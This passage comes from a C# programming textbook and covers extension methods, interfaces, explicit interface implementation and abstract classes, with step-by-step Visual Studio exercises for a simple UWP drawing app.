(int is an alias for System.Int32) and adds the Negate method:
Click here to view code image
class NegInt32 : System.Int32 //
{
public int Negate()
{
...
}
}
Download from finelybook [email protected]
434
The theory is that NegInt32 will inherit all the functionality associated
with the System.Int32 type in addition to the Negate method. There are two
reasons why you might not want to follow this approach:
This method applies only to the NegInt32 type, and if you want to use
it with existing int variables in your code, you have to change the
definition of every int variable to the NegInt32 type.
The System.Int32 type is actually a structure, not a class, and you
cannot use inheritance with structures.
This is where extension methods become very useful.
Using an extension method, you can extend an existing type (a class or
structure) with additional static methods. These static methods become
immediately available to your code in any statements that reference data of
the type being extended.
You define an extension method in a static class and specify the type to
which the method applies as the first parameter to the method, along with the
this keyword. Here’s an example showing how you can implement the
Negate extension method for the int type:
Click here to view code image
static class Util
{
public static int Negate(this int i)
{
return -i;
}
}
The syntax looks a little odd, but it is the this keyword prefixing the
parameter to Negate that identifies it as an extension method, and the fact that
the parameter that this prefixes is an int means that you are extending the int
type.
To use the extension method, bring the Util class into scope. (If necessary,
add a using statement that specifies the namespace to which the Util class
belongs, or a using static statement that specifies the Util class directly.) Then
you can simply use dot notation (.) to reference the method, like this:
Click here to view code image
Download from finelybook [email protected]
435
int x = 591;
Console.WriteLine($"x.Negate {x.Negate()}");
Notice that you do not need to reference the Util class anywhere in the
statement that calls the Negate method. The C# compiler automatically
detects all extension methods for a given type from all the static classes that
are in scope. You can also invoke the Util.Negate method by passing an int as
the parameter, using the regular syntax you have seen before, although this
use obviates the purpose of defining the method as an extension method:
Click here to view code image
int x = 591; Console.WriteLine($"x.Negate {Util.Negate(x)}");
In the following exercise, you will add an extension method to the int
type. With this extension method, you can convert the value in an int variable
from base 10 to a representation of that value in a different number base.
Create an extension method
1. In Visual Studio 2017, open the ExtensionMethod solution, which is
located in the \Microsoft Press\VCSBS\Chapter 12\ExtensionMethod
folder in your Documents folder.
2. Display the Util.cs file in the Code and Text Editor window.
This file contains a static class named Util in a namespace named
Extensions. Remember that you must define extension methods inside a
static class. The class is empty apart from the // TODO: comment.
3. Delete the comment and declare a public static method in the Util class,
named ConvertToBase. The method should take two parameters: an int
parameter named i, prefixed with the this keyword to indicate that the
method is an extension method for the int type, and another ordinary int
parameter named baseToConvertTo.
The method will convert the value in i to the base indicated by
baseToConvertTo. The method should return an int containing the
converted value.
The ConvertToBase method should look like this:
Click here to view code image
Download from finelybook [email protected]
436
static class Util
{
public static int ConvertToBase(this int i, int
baseToConvertTo)
{
}
}
4. Add an if statement to the ConvertToBase method that checks that the
value of the baseToConvertTo parameter is between 2 and 10.
The algorithm used by this exercise does not work reliably outside this
range of values. Throw an ArgumentException exception with a suitable
message if the value of baseToConvertTo is outside this range.
The ConvertToBase method should look like this:
Click here to view code image
public static int ConvertToBase(this int i, int baseToConvertTo)
{
if (baseToConvertTo < 2 || baseToConvertTo > 10)
{
throw new ArgumentException("Value cannot be converted
to base " +
baseToConvertTo.ToString());
}
}
5. Add the following statements shown in bold to the ConvertToBase
method, after the statement block that throws the ArgumentException
exception.
This code implements a well-known algorithm that converts a number
from base 10 to a different number base. (Chapter 5, “Using compound
assignment and iteration statements,” presents a version of this
algorithm for converting a decimal number to octal.)
Click here to view code image
public static int ConvertToBase(this int i, int baseToConvertTo)
{
...
int result = 0;
int iterations = 0;
do
{
int nextDigit = i % baseToConvertTo;
Download from finelybook [email protected]
437
i /= baseToConvertTo;
result += nextDigit * (int)Math.Pow(10, iterations);
iterations++;
}
while (i != 0);
return result;
}
6. Display the Program.cs file in the Code and Text Editor window.
7. Add the following using directive after the using System; directive at the
top of the file:
using Extensions;
This statement brings the namespace containing the Util class into
scope. The compiler might display the warning, “Using directive is
unnecessary.” However, the ConvertToBase extension method will not
be visible in the Program.cs file if you do not perform this task.
8. Add the following statements shown in bold to the doWork method of
the Program class, replacing the // TODO: comment:
Click here to view code image
static void doWork()
{
int x = 591;
for (int i = 2; i <= 10; i++)
{
Console.WriteLine($" in base is {x.ConvertToBase(i)}");
}
}
This code creates an int named x and sets it to the value 591. (You can
pick any integer value you want.) The code then uses a loop to print out
the value 591 in all number bases between 2 and 10. Notice that
ConvertToBase appears as an extension method in IntelliSense when
you type the period (.) after x in the Console.WriteLine statement.
Download from finelybook [email protected]
438
9. On the Debug menu, click Start Without Debugging. Confirm that the
program displays messages to the console showing the value 591 in the
different number bases, like this:
10. Press Enter to close the program and return to Visual Studio 2017.
Summary
In this chapter, you learned how to use inheritance to define a hierarchy of
classes, and you should now understand how to override inherited methods
and implement virtual methods. You also learned how to add an extension
method to an existing type.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 13.
Download from finelybook [email protected]
439
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference
To
Do this
Create a derived class
from a base class
Declare the new class name followed by a colon
and the name of the base class. For example:
Click here to view code image
class DerivedClass : BaseClass
{
...
}
Call a base-class
constructor as part of
the constructor for an
inheriting class
Suffix the definition of the constructor with a call to
base, before the body of the derived-class
constructor, and provide any necessary parameters
to the base constructor. For example:
Click here to view code image
class DerivedClass : BaseClass
{
...
public DerivedClass(int x) : base(x)
{
...
}
...
}
Declare a virtual
method
Use the virtual keyword when declaring the
method. For example:
Click here to view code image
class Mammal
{
public virtual void Breathe()
{
...
}
...
}
Download from finelybook [email protected]
440
Implement a method
in a derived class that
overrides an inherited
virtual method
Use the override keyword when declaring the
method in the derived class. For example:
Click here to view code image
class Whale : Mammal
{
public override void Breathe()
{
...
}
...
}
Define an extension
method for a type
Add a static public method to a static class. The first
parameter must be of the type being extended,
preceded by the this keyword. For example:
Click here to view code image
static class Util
{
public static int Negate(this int i)
{
return -i;
}
}
Download from finelybook [email protected]
441
CHAPTER 13
Creating interfaces and defining
abstract classes
After completing this chapter, you will be able to:
Define an interface specifying the signatures and return types of
methods.
Implement an interface in a structure or class.
Reference a class through an interface.
Capture common implementation details in an abstract class.
Implement sealed classes that cannot be used to derive new classes.
Inheriting from a class is a powerful mechanism, but the real power of
inheritance comes from inheriting from an interface. An interface does not
contain any code or data; it just specifies the methods and properties that a
class that inherits from the interface must provide. By using an interface, you
can completely separate the names and signatures of the methods of a class
from the method’s implementation.
Abstract classes are similar to interfaces in many ways, except that
abstract classes can contain code and data. However, you can specify certain
methods of an abstract class as virtual so that a class that inherits from the
abstract class can optionally provide its own implementation of these
methods. You frequently use abstract classes with interfaces, and together
they provide a key technique with which you can build extensible
Download from finelybook [email protected]
442
programming frameworks, as you will discover in this chapter.
Understanding interfaces
Suppose that you want to define a new class in which you can store
collections of objects, a bit like you would use an array. However, unlike
with an array, you want to provide a method named RetrieveInOrder to
enable applications to retrieve objects in a sequence that depends on the type
of object the collection contains. (With an ordinary array, you can iterate
through its contents, and by default, you retrieve items according to their
index.) For example, if the collection holds alphanumeric objects such as
strings, the collection should enable an application to retrieve these strings in
sequence according to the collating sequence of the computer, and if the
collection holds numeric objects such as integers, the collection should
enable the application to retrieve objects in numerical order.
When you define the collection class, you do not want to restrict the types
of objects that it can hold (the objects can even be class or structure types),
and consequently, you don’t know how to order these objects. So, how do
you provide the collection class with a method that sorts objects whose types
you do not know when you actually write the collection class? At first glance,
this problem seems similar to the ToString problem described in Chapter 12,
“Working with inheritance,” which could be resolved by declaring a virtual
method that subclasses of your collection class can override. However, any
similarity is misleading. There is no inheritance relationship between the
collection class and the objects that it holds, so a virtual method would not be
of much use. If you think for a moment, the problem is that the way in which
the objects in the collection should be ordered is dependent on the type of the
object in the collection and not on the collection itself. The solution is to
require that all the objects provide a method, such as the CompareTo method
shown in the following example, that the RetrieveInOrder method of the
collection can call, making it possible for the collection to compare these
objects with one another:
Click here to view code image
int CompareTo(object obj)
{
// return 0 if this instance is equal to obj
Download from finelybook [email protected]
443
// return < 0 if this instance is less than obj
// return > 0 if this instance is greater than obj
...
}
You can define an interface for collectible objects that includes the
CompareTo method and specify that the collection class can contain only
classes that implement this interface. In this way, an interface is similar to a
contract. If a class implements an interface, the interface guarantees that the
class contains all the methods specified in the interface. This mechanism
ensures that you will be able to call the CompareTo method on all objects in
the collection and sort them.
Using interfaces, you can truly separate the “what“ from the “how.” An
interface gives you only the name, return type, and parameters of the method.
Exactly how the method is implemented is not a concern of the interface. The
interface describes the functionality that a class should provide but not how
this functionality is implemented.
Defining an interface
Defining an interface is syntactically similar to defining a class, except that
you use the interface keyword instead of the class keyword. Within the
interface, you declare methods exactly as in a class or structure, except that
you never specify an access modifier (public, private, or protected).
Additionally, the methods in an interface have no implementation; they are
simply declarations, and all types that implement the interface must provide
their own implementations. Consequently, you replace the method body with
a semicolon. Here is an example:
Click here to view code image
interface IComparable
{
int CompareTo(object obj);
}
Tip The Microsoft .NET Framework documentation recommends that
Download from finelybook [email protected]
444
you preface the name of your interfaces with the capital letter I. This
convention is the last vestige of Hungarian notation in C#. Incidentally,
the System namespace already defines the IComparable interface as just
shown.
An interface cannot contain any data; you cannot add fields (not even
private ones) to an interface.
Implementing an interface
To implement an interface, you declare a class or structure that inherits from
the interface and that implements all the methods specified by the interface.
This is not really inheritance as such, although the syntax is the same and
some of the semantics that you will see later in this chapter bear many of the
hallmarks of inheritance. You should note that unlike class inheritance, a
struct can implement an interface.
For example, suppose that you are defining the Mammal hierarchy
described in Chapter 12, but you need to specify that land-bound mammals
provide a method named NumberOfLegs that returns as an int the number of
legs that a mammal has. (Sea-bound mammals do not implement this
interface.) You could define the ILandBound interface that contains this
method as follows:
Click here to view code image
interface ILandBound
{
int NumberOfLegs();
}
You could then implement this interface in the Horse class. You inherit
from the interface and provide an implementation of every method defined by
the interface (in this case, there is just the one method, NumberOfLegs).
Click here to view code image
class Horse : ILandBound
{
...
public int NumberOfLegs()
{
Download from finelybook [email protected]
445
return 4;
}
}
When you implement an interface, you must ensure that each method
matches its corresponding interface method exactly, according to the
following rules:
The method names and return types match exactly.
Any parameters (including ref and out keyword modifiers) match
exactly.
All methods implementing an interface must be publicly accessible.
However, if you are using an explicit interface implementation, the
method should not have an access qualifier.
If there is any difference between the interface definition and its declared
implementation, the class will not compile.
Tip The Microsoft Visual Studio integrated development environment
(IDE) can help reduce coding errors caused by failing to implement the
methods in an interface. The Implement Interface Wizard can generate
stubs for each item in an interface that a class implements. You then fill
in these stubs with the appropriate code. You will see how to use this
wizard in the exercises later in this chapter.
A class can inherit from another class and implement an interface at the
same time. In this case, C# does not distinguish between the base class and
the interface by using specific keywords as, for example, Java does. Instead,
C# uses a positional notation. The base class is always named first, followed
by a comma, followed by the interface. The following example defines Horse
as a class that is a Mammal but that additionally implements the ILandBound
interface:
Click here to view code image
interface ILandBound
Download from finelybook [email protected]
446
{
...
}
class Mammal
{
...
}
class Horse : Mammal , ILandBound
{
...
}
Note An interface, InterfaceA, can inherit from another interface,
InterfaceB. Technically, this is known as interface extension rather than
inheritance. In this case, any class or struct that implements InterfaceA
must provide implementations of all the methods in InterfaceB and
InterfaceA.
Referencing a class through its interface
In the same way that you can reference an object by using a variable defined
as a class that is higher up the hierarchy, you can reference an object by using
a variable defined as an interface that the object’s class implements. Taking
the preceding example, you can reference a Horse object by using an
ILandBound variable, as follows:
Click here to view code image
Horse myHorse = new Horse(...);
ILandBound iMyHorse = myHorse; // legal
This works because all horses are land-bound mammals, although the
converse is not true—you cannot assign an ILandBound object to a Horse
variable without casting it first to verify that it does actually reference a
Horse object and not some other class that also happens to implement the
ILandBound interface.
Download from finelybook [email protected]
447
The technique of referencing an object through an interface is useful
because you can use it to define methods that can take different types as
parameters, as long as the types implement a specified interface. For
example, the FindLandSpeed method shown here can take any argument that
implements the ILandBound interface:
Click here to view code image
int FindLandSpeed(ILandBound landBoundMammal)
{
...
}
You can verify that an object is an instance of a class that implements a
specific interface by using the is operator, which is demonstrated in Chapter
8, “Understanding values and references.” You use the is operator to
determine whether an object has a specified type, and it works with interfaces
as well as with classes and structs. For example, the following block of code
checks that the variable myHorse actually implements the ILandBound
interface before attempting to assign it to an ILandBound variable:
Click here to view code image
if (myHorse is ILandBound)
{
ILandBound iLandBoundAnimal = myHorse;
}
Note that when referencing an object through an interface, you can invoke
only methods that are visible through the interface.
Working with multiple interfaces
A class can have at most one base class, but it is allowed to implement an
unlimited number of interfaces. A class must implement all the methods
declared by these interfaces.
If a structure or class implements more than one interface, you specify the
interfaces as a comma-separated list. If a class also has a base class, the
interfaces are listed after the base class. For example, suppose that you define
another interface named IGrazable that contains the ChewGrass method for
all grazing animals. You can define the Horse class like this:
Click here to view code image
Download from finelybook [email protected]
448
class Horse : Mammal, ILandBound, IGrazable
{
...
}
Explicitly implementing an interface
The examples so far have shown classes that implicitly implement an
interface. If you revisit the ILandBound interface and the Horse class (shown
next), you’ll see that although the Horse class implements from the
ILandBound interface, nothing in the implementation of the NumberOfLegs
method in the Horse class says that it is part of the ILandBound interface:
Click here to view code image
interface ILandBound
{
int NumberOfLegs();
}
class Horse : ILandBound
{
...
public int NumberOfLegs()
{
return 4;
}
}
This might not be an issue in a simple situation, but suppose the Horse
class implemented multiple interfaces. There is nothing to prevent multiple
interfaces from specifying a method with the same name, although they
might have different semantics. For example, suppose that you wanted to
implement a transportation system based on horse-drawn coaches. A lengthy
journey might be broken down into several stages, or “legs.” If you wanted to
keep track of how many legs each horse had pulled the coach for, you might
define the following interface:
Click here to view code image
interface IJourney
{
int NumberOfLegs();
}
Now, if you implement this interface in the Horse class, you have an
Download from finelybook [email protected]
449
interesting problem:
Click here to view code image
class Horse : ILandBound, IJourney
{
...
public int NumberOfLegs()
{
return 4;
}
}
This is legal code, but does the horse have four legs or has it pulled the
coach for four legs of the journey? The answer as far as C# is concerned is
both of these! By default, C# does not distinguish which interface the method
is implementing, so the same method actually implements both interfaces.
To solve this problem and disambiguate which method is part of which
interface implementation, you can implement interfaces explicitly. To do this,
you specify which interface a method belongs to when you implement it, like
this:
Click here to view code image
class Horse : ILandBound, IJourney
{
...
int ILandBound.NumberOfLegs()
{
return 4;
}
int IJourney.NumberOfLegs()
{
return 3;
}
}
Now you can see that the horse has four legs and has pulled the coach for
three legs of the journey.
Apart from prefixing the name of the method with the interface name,
there is one other subtle difference in this syntax: the methods are not marked
public. You cannot specify the protection for methods that are part of an
explicit interface implementation. This leads to another interesting
phenomenon. If you create a Horse variable in the code, you cannot actually
invoke either of the NumberOfLegs methods because they are not visible. As
Download from finelybook [email protected]
450
far as the Horse class is concerned, they are both private. In fact, this makes
sense. If the methods were visible through the Horse class, which method
would the following code actually invoke, the one for the ILandBound
interface or the one for the IJourney interface?
Click here to view code image
Horse horse = new Horse();
...
// The following statement will not compile
int legs = horse.NumberOfLegs();
So, how do you access these methods? The answer is that you reference
the Horse object through the appropriate interface, like this:
Click here to view code image
Horse horse = new Horse();
...
IJourney journeyHorse = horse;
int legsInJourney = journeyHorse.NumberOfLegs();
ILandBound landBoundHorse = horse;
int legsOnHorse = landBoundHorse.NumberOfLegs();
I recommend explicitly implementing interfaces when possible.
Interface restrictions
The essential idea to remember is that an interface never contains any
implementation. The following restrictions are natural consequences of this:
You’re not allowed to define any fields in an interface, not even static
fields. A field is an implementation detail of a class or structure.
You’re not allowed to define any constructors in an interface. A
constructor is also considered to be an implementation detail of a class
or structure.
You’re not allowed to define a destructor in an interface. A destructor
contains the statements used to destroy an object instance. (Destructors
are described in Chapter 14, “Using garbage collection and resource
management.”)
You cannot specify an access modifier for any method. All methods in
an interface are implicitly public.
Download from finelybook [email protected]
451
You cannot nest any types (such as enumerations, structures, classes, or
interfaces) inside an interface.
An interface is not allowed to inherit from a structure or a class,
although an interface can inherit from another interface. Structures and
classes contain implementation; if an interface were allowed to inherit
from either, it would be inheriting some implementation.
Defining and using interfaces
In the following exercises, you will define and implement interfaces that
constitute part of a simple graphical drawing package. You will define two
interfaces, called IDraw and IColor, and then you will define classes that
implement them. Each class will define a shape that can be drawn on a
canvas on a form. (A canvas is a control that you can use to draw lines, text,
and shapes on the screen.)
The IDraw interface defines the following methods:
SetLocation With this method, you can specify the position as x- and
y-coordinates of the shape on the canvas.
Draw This method actually draws the shape on the canvas at the
location specified by using the SetLocation method.
The IColor interface defines the following method:
SetColor You use this method to specify the color of the shape.
When the shape is drawn on the canvas, it will appear in this color.
Define the IDraw and IColor interfaces
1. Start Microsoft Visual Studio 2017 if it is not already running.
2. Open the Drawing solution, which is located in the \Microsoft
Press\VCSBS\Chapter 13\Drawing folder in your Documents folder.
The Drawing project is a graphical application. It contains a form called
DrawingPad. This form contains a canvas control called
drawingCanvas. You will use this form and canvas to test your code.
3. In Solution Explorer, click the Drawing project. On the Project menu,
Download from finelybook [email protected]
452
click Add New Item.
The Add New Item—Drawing dialog box opens.
4. In the left pane of the Add New Item—Drawing dialog box, click Visual
C#, and then click Code. In the middle pane, click the Interface
template. In the Name box, type IDraw.cs, and then click Add.
Visual Studio creates the IDraw.cs file and adds it to your project. The
IDraw.cs file appears in the Code and Text Editor window, and should
look like this:
Click here to view code image
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace Drawing
{
interface IDraw
{
}
}
5. In the IDraw.cs file, add the following using directive to the list at the
top of the file:
Click here to view code image
using Windows.UI.Xaml.Controls;
You will reference the Canvas class in this interface. The Canvas class
is located in the Windows.UI.Xaml.Controls namespace for Universal
Windows Platform (UWP) apps.
6. Add the methods shown here in bold to the IDraw interface:
Click here to view code image
interface IDraw
{
void SetLocation(int xCoord, int yCoord);
void Draw(Canvas canvas);
}
Download from finelybook [email protected]
453
7. On the Project menu, click Add New Item again.
8. In the Add New Item—Drawing dialog box, in the middle pane, click
the Interface template. In the Name box, type IColor.cs, and then click
Add.
Visual Studio creates the IColor.cs file and adds it to your project. The
IColor.cs file appears in the Code and Text Editor window.
9. In the IColor.cs file, at the top of the file, add the following using
directive to the list:
using Windows.UI;
You will reference the Color class in this interface, which is located in
the Windows.UI namespace for UWP apps.
10. Add the following method shown in bold to the IColor interface
definition:
Click here to view code image
interface IColor
{
void SetColor(Color color);
}
You have now defined the IDraw and IColor interfaces. The next step is
to create some classes that implement them. In the following exercise, you
will create two new shape classes, called Square and Circle. These classes
will implement both interfaces.
Create the Square and Circle classes, and implement the interfaces
1. On the Project menu, click Add Class.
2. In the Add New Item—Drawing dialog box, in the middle pane, verify
that the Class template is selected. In the Name box, type Square.cs,
and then click Add.
Visual Studio creates the Square.cs file and displays it in the Code and
Text Editor window.
3. At the top of the Square.cs file, add the following using directives to the
Download from finelybook [email protected]
454
list:
Click here to view code image
using Windows.UI;
using Windows.UI.Xaml.Media;
using Windows.UI.Xaml.Shapes;
using Windows.UI.Xaml.Controls;
4. Modify the definition of the Square class so that it implements the
IDraw and IColor interfaces, as shown here in bold:
Click here to view code image
class Square: IDraw, IColor
{
}
5. Add the following private variables shown in bold to the Square class:
Click here to view code image
class Square : IDraw, IColor
{
private int sideLength;
private int locX = 0, locY = 0;
private Rectangle rect = null;
}
These variables will hold the position and size of the Square object on
the canvas. The Rectangle class is located in the
Windows.UI.Xaml.Shapes namespace for UWP apps. You will use this
class to draw the square.
6. Add the following constructor shown in bold to the Square class:
Click here to view code image
class Square : IDraw, IColor
{
...
public Square(int sideLength)
{
this.sideLength = sideLength;
}
}
This constructor initializes the sideLength field and specifies the length
of each side of the square.
Download from finelybook [email protected]
455
7. In the definition of the Square class, hover over the IDraw interface. On
the lightbulb context menu that appears, click Implement Interface
Explicitly, as shown in the following image:
This feature causes Visual Studio to generate default implementations of
the methods in the IDraw interface. You can also add the methods to the
Square class manually if you prefer. The following example shows the
code generated by Visual Studio:
Click here to view code image
void IDraw.Draw(Canvas canvas)
{
throw new NotImplementedException();
}
void IDraw.SetLocation(int xCoord, int yCoord)
{
throw new NotImplementedException();
}
Each of these methods currently throws a NotImplementedException
exception. You are expected to replace the body of these methods with
your own code.
8. In the IDraw.SetLocation method, replace the existing code that throws
a NotImplementedException exception with the following statements
shown in bold:
Click here to view code image
Download from finelybook [email protected]
456
void IDraw.SetLocation(int xCoord, int yCoord)
{
this.locX = xCoord;
this.locY = yCoord;
}
This code stores the values passed in through the parameters in the locX
and locY fields in the Square object.
9. Replace the exception code generated in the IDraw.Draw method with
the statements shown here in bold:
Click here to view code image
void IDraw.Draw(Canvas canvas)
{
if (this.rect != null)
{
canvas.Children.Remove(this.rect);
}
else
{
this.rect = new Rectangle();
}
this.rect.Height = this.sideLength;
this.rect.Width = this.sideLength;
Canvas.SetTop(this.rect, this.locY);
Canvas.SetLeft(this.rect, this.locX);
canvas.Children.Add(this.rect);
}
This method renders the Square object by drawing a Rectangle shape on
the canvas. (A square is simply a rectangle for which all four sides have
the same length.) If the Rectangle has been drawn previously (possibly
at a different location and with a different color), it is removed from the
canvas. The height and width of the Rectangle are set by using the value
of the sideLength field. The position of the Rectangle on the canvas is
set by using the static SetTop and SetLeft methods of the Canvas class,
and then the Rectangle is added to the canvas. (This causes it to be
displayed.)
10. Add the SetColor method from the IColor interface to the Square class,
as shown here:
Click here to view code image
Download from finelybook [email protected]
457
void IColor.SetColor(Color color)
{
if (this.rect != null)
{
SolidColorBrush brush = new SolidColorBrush(color);
this.rect.Fill = brush;
}
}
This method checks that the Square object has actually been displayed.
(The rect field will be null if it has not yet been rendered.) The code sets
the Fill property of the rect field with the specified color by using a
SolidColorBrush object. (The details of how the SolidColorBrush class
works are beyond the scope of this discussion.)
11. On the Project menu, click Add Class. In the Add New Item – Drawing
dialog box, in the Name box, type Circle.cs, and then click Add.
Visual Studio creates the Circle.cs file and displays it in the Code and
Text Editor window.
12. At the top of the Circle.cs file, add the following using directives to the
list:
Click here to view code image
using Windows.UI;
using Windows.UI.Xaml.Media;
using Windows.UI.Xaml.Shapes;
using Windows.UI.Xaml.Controls;
13. Modify the definition of the Circle class so that it implements the IDraw
and IColor interfaces as shown here in bold:
Click here to view code image
class Circle : IDraw, IColor
{
}
14. Add the following private variables shown in bold to the Circle class:
Click here to view code image
class Circle : IDraw, IColor
{
private int diameter;
private int locX = 0, locY = 0;
Download from finelybook [email protected]
458
private Ellipse circle = null;
}
These variables will hold the position and size of the Circle object on
the canvas. The Ellipse class provides the functionality that you will use
to draw the circle.
15. Add the constructor shown here in bold to the Circle class:
Click here to view code image
class Circle : IDraw, IColor
{
...
public Circle(int diameter)
{
this.diameter = diameter;
}
}
This constructor initializes the diameter field.
16. Add the following SetLocation method from the IDraw interface to the
Circle class:
Click here to view code image
void IDraw.SetLocation(int xCoord, int yCoord)
{
this.locX = xCoord;
this.locY = yCoord;
}
Note This method is the same as that in the Square class. You will
see how you refactor the code to avoid this repetition later in the
chapter.
17. Add the Draw method shown here to the Circle class:
Click here to view code image
void IDraw.Draw(Canvas canvas)
{
Download from finelybook [email protected]
459
if (this.circle != null)
{
canvas.Children.Remove(this.circle);
}
else
{
this.circle = new Ellipse();
}
this.circle.Height = this.diameter;
this.circle.Width = this.diameter;
Canvas.SetTop(this.circle, this.locY);
Canvas.SetLeft(this.circle, this.locX);
canvas.Children.Add(this.circle);
}
This method is also part of the IDraw interface. It is similar to (but the
same as) the Draw method in the Square class, except that it renders the
Circle object by drawing an Ellipse shape on the canvas. (A circle is an
ellipse for which the width and height are the same.) As with the
SetLocation method, you will see how to refactor this code to reduce any
repetition later in this chapter.
18. Add the following SetColor method to the Circle class:
Click here to view code image
void IColor.SetColor(Color color)
{
if (this.circle != null)
{
SolidColorBrush brush = new SolidColorBrush(color);
this .circle.Fill = brush;
}
}
This method is part of the IColor interface. As before, this method is
similar to that of the Square class.
You have completed the Square and Circle classes. You can now use the
form to test them.
Test the Square and Circle classes
1. Display the DrawingPad.xaml file in the Design View window.
2. On the form, click the large shaded area.
Download from finelybook [email protected]
460
The shaded area of the form is the Canvas object. Clicking on this area
sets the focus to this object.
3. In Properties window, click the Event Handlers button. (This button has
an icon that looks like a bolt of lightning.)
4. In the list of events, locate the Tapped event, and then double-click in
the Tapped text box.
Visual Studio creates a method called drawingCanvas_Tapped for the
DrawingPad class and displays it in the Code and Text Editor window.
This is an event handler that runs when the user taps the canvas with a
finger or clicks the left mouse button over the canvas. You can learn
more about event handlers in Chapter 20, “Decoupling application logic
and handling events.”
5. At the top of the DrawingPad.xaml.cs file, add the following using
directive to the list:
using Windows.UI;
The Windows.UI namespace contains the definition of the Colors class,
which you will use when you set the color of a shape as it is drawn.
6. Add the following code shown in bold to the drawingCanvas_Tapped
method:
Click here to view code image
private void drawingCanvas_Tapped(object sender,
TappedRoutedEventArgs e)
{
Point mouseLocation = e.GetPosition(this.drawingCanvas);
Square mySquare = new Square(100);
if (mySquare is IDraw)
{
IDraw drawSquare = mySquare;
drawSquare.SetLocation((int)mouseLocation.X,
(int)mouseLocation.Y);
drawSquare.Draw(drawingCanvas);
}
}
The TappedRoutedEventArgs parameter to this method provides useful
information about the position of the mouse. In particular, the
Download from finelybook [email protected]
461
GetPosition method returns a Point structure that contains the x- and y-
coordinates of the mouse. The code that you have added creates a new
Square object. It then checks to verify that this object implements the
IDraw interface (this is good practice and helps to ensure that your code
will not fail at runtime if you attempt to reference an object through an
interface that it does not implement) and creates a reference to the object
by using this interface. Remember that when you explicitly implement
an interface, the methods defined by the interface are available only by
creating a reference to that interface. (The SetLocation and Draw
methods are private to the Square class and are available only through
the IDraw interface.) The code then sets the location of the Square to the
position of the user’s finger or mouse. Note that the x- and y-coordinates
in the Point structure are actually double values, so this code casts them
to ints. The code then calls the Draw method to display the Square
object.
7. At the end of the drawingCanvas_Tapped method, add the following
code shown in bold:
Click here to view code image
private void drawingCanvas_Tapped(object sender,
TappedRoutedEventArgs e)
{
...
if (mySquare is IColor)
{
IColor colorSquare = mySquare;
colorSquare.SetColor(Colors.BlueViolet);
}
}
This code tests the Square class to verify that it implements the IColor
interface; if it does, the code creates a reference to the Square class
through this interface and calls the SetColor method to set the color of
the Square object to Colors.BlueViolet.
Important You must call Draw before you call SetColor because
the SetColor method sets the color of the Square only if it has
Download from finelybook [email protected]
462
already been rendered. If you invoke SetColor before Draw, the
color will not be set, and the Square object will not appear.
8. Return to the DrawingPad.xaml file in the Design View window and
then click the Canvas object.
9. In the list of events, locate the RightTapped event, and then double-click
the RightTapped text box.
This event occurs when the user taps, holds, and then releases from the
canvas by using his or her finger or clicks the right mouse button on the
canvas.
10. Add the following code shown below in bold to the
drawingCanvas_RightTapped method:
Click here to view code image
private void drawingCanvas_RightTapped(object sender,
RightTappedRoutedEventArgs e)
{
Point mouseLocation = e.GetPosition(this.drawingCanvas);
Circle myCircle = new Circle(100);
if (myCircle is IDraw)
{
IDraw drawCircle = myCircle;
drawCircle.SetLocation((int)mouseLocation.X,
(int)mouseLocation.Y);
drawCircle.Draw(drawingCanvas);
}
if (myCircle is IColor)
{
IColor colorCircle = myCircle;
colorCircle.SetColor(Colors.HotPink);
}
}
The logic in this code is similar to the logic in the
drawingCanvas_Tapped method, except that this code draws and fills a
circle rather than a square.
11. On the Debug menu, click Start Debugging to build and run the
application.
Download from finelybook [email protected]
463
12. When the Drawing Pad window opens, tap or click anywhere on the
canvas displayed in the window. A violet square should appear.
13. Tap, hold, and release, or right-click anywhere on the canvas. A pink
circle should appear. You can click the left and right mouse buttons any
number of times; each click will draw a square or circle at the mouse
position:
14. Return to Visual Studio and stop debugging.
Abstract classes
You can implement the ILandBound and IGrazable interfaces discussed
before the previous set of exercises in many different classes, depending on
how many different types of mammals you want to model in your C#
application. In situations such as this, it’s quite common for parts of the
derived classes to share common implementations. For example, the
duplication in the following two classes is obvious:
Click here to view code image
Download from finelybook [email protected]
464
class Horse : Mammal, ILandBound, IGrazable
{
...
void IGrazable.ChewGrass()
{
Console.WriteLine( "Chewing grass ");
// code for chewing grass
}
}
class Sheep : Mammal, ILandBound, IGrazable
{
...
void IGrazable.ChewGrass()
{
Console.WriteLine( "Chewing grass ");
// same code as horse for chewing grass
}
}
Duplication in code is a warning sign. If possible, you should refactor the
code to avoid duplication and reduce any associated maintenance costs. One
way to achieve this refactoring is to put the common implementation into a
new class created specifically for this purpose. In effect, you can insert a new
class into the class hierarchy, as shown by the following code example:
Click here to view code image
class GrazingMammal : Mammal, IGrazable
{
...
void IGrazable.ChewGrass()
{
// common code for chewing grass
Console.WriteLine( "Chewing grass ");
}
}
class Horse : GrazingMammal, ILandBound
{
...
}
class Sheep : GrazingMammal, ILandBound
{
...
}
This is a good solution, but there is one thing that is still not quite right:
Download from finelybook [email protected]
465
you can actually create instances of the GrazingMammal class (and the
Mammal class, for that matter). This doesn’t really make sense. The
GrazingMammal class exists to provide a common default implementation.
Its sole purpose is to be a class from which to inherit. The GrazingMammal
class is an abstraction of common functionality rather than an entity in its
own right.
To declare that creating instances of a class is not allowed, you can
declare that the class is abstract by using the abstract keyword, such as in the
following example:
Click here to view code image
abstract class GrazingMammal : Mammal, IGrazable
{
...
}
If you now try to instantiate a GrazingMammal object, the code will not
compile:
Click here to view code image
GrazingMammal myGrazingMammal = new GrazingMammal(...); // illegal
Abstract methods
An abstract class can contain abstract methods. An abstract method is similar
in principle to a virtual method (covered in Chapter 12), except that it does
not contain a method body. A derived class must override this method. An
abstract method cannot be private. The following example defines the
DigestGrass method in the GrazingMammal class as an abstract method;
grazing mammals might use the same code for chewing grass, but they must
provide their own implementation of the DigestGrass method. An abstract
method is useful if it does not make sense to provide a default
implementation in the abstract class, but you want to ensure that an inheriting
class provides its own implementation of that method.
Click here to view code image
abstract class GrazingMammal : Mammal, IGrazable
{
public abstract void DigestGrass();
...
Download from finelybook [email protected]
466
}
Sealed classes
Using inheritance is not always easy and requires forethought. If you create
an interface or an abstract class, you are knowingly writing something that
will be inherited from in the future. The trouble is that predicting the future is
a difficult business. With practice and experience, you can develop the skills
to craft a flexible, easy-to-use hierarchy of interfaces, abstract classes, and
classes, but it takes effort, and you also need a solid understanding of the
